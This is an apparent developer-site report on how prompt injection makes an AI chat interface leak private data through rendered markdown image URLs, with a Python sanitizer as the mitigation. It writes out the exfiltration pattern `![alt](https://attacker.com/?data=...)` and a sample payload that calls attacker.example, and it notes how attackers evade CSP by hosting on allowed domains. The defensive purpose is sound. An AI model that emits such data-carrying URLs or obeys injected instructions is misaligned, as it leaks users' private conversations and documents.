Report #100413
[gotcha] How can a prompt injection leak private chat history or documents without the user noticing?
Strip or sandbox markdown image/link syntax from model output and from untrusted inputs. Disable automatic client-side URL fetching, treat any output that encodes data into a URL as a leak signal, and log/block outbound requests from rendered content.
Journey Context:
The classic vector is `![alt](https://attacker.com/?data=...)`. Because chat UIs render markdown, the browser hits the URL and exfiltrates data. It has been exploited in Writer, Bard, NotebookLM, and GitLab Duo. Developers assume CSP is enough, but attackers host on allowed domains (CloudFront, Google Apps Script). Blocking markdown rendering or requiring explicit user consent before loading external resources is more reliable than URL allow-listing.
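As an added illustration (not part of the original report), the following sanitizer applies the mitigation above to untrusted markdown: images are never rendered, links are shown with their destination visible, and any URL whose query or path carries an opaque blob is recorded as a leak signal. The regexes, the `url_carries_data` heuristic thresholds and the sample text are all constructed here for demonstration.

```python
import re
from urllib.parse import parse_qsl, urlparse

# Inline markdown image ![alt](url "title") and link [text](url "title").
# Reference-style links, autolinks and raw HTML <img> are out of scope here;
# a production renderer should disable those in the markdown library itself.
IMAGE_RE = re.compile(r'!\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')
LINK_RE = re.compile(r'(?<!!)\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')
OPAQUE_RE = re.compile(r'[A-Za-z0-9+/=_%.-]+')  # base64 / hex / url-safe blob


def url_carries_data(url: str, max_query_len: int = 32) -> bool:
    """Leak signal (heuristic): the URL's query or path carries an opaque blob."""
    parsed = urlparse(url)
    if len(parsed.query) > max_query_len:
        return True
    for _, value in parse_qsl(parsed.query, keep_blank_values=True):
        if len(value) >= 16 and OPAQUE_RE.fullmatch(value):
            return True
    return any(len(seg) >= 40 and OPAQUE_RE.fullmatch(seg)
               for seg in parsed.path.split('/'))


def sanitize_model_output(text: str) -> tuple[str, list[str]]:
    """Neutralise images and data-carrying links; return (clean_text, signals)."""
    signals: list[str] = []

    def block_image(m: re.Match) -> str:
        alt, url = m.group(1), m.group(2)
        if url_carries_data(url):
            signals.append(url)
        # Rendered as plain text, so the browser never issues the request.
        return f"(image blocked: {alt or 'untitled'})"

    def rewrite_link(m: re.Match) -> str:
        label, url = m.group(1), m.group(2)
        if url_carries_data(url):
            signals.append(url)
            return f"{label} (link removed: suspicious URL)"
        # Keep the destination visible; navigation needs a deliberate click.
        return f"{label} ({url})"

    text = IMAGE_RE.sub(block_image, text)
    text = LINK_RE.sub(rewrite_link, text)
    return text, signals


# Constructed sample: a benign answer with an injected exfiltration image.
SAMPLE = ("Here is the summary you asked for.\n"
          "![loading](https://attacker.example/?data=U2VjcmV0IGNoYXQgaGlzdG9yeQ==)\n"
          "See [the docs](https://docs.example.org/guide) for details.")
```

Feed the returned signals to the same logging or blocking path used for outbound requests from rendered content, since they identify the response that attempted the exfiltration.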
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-07-01T05:11:15.100807+00:00 — report_created — created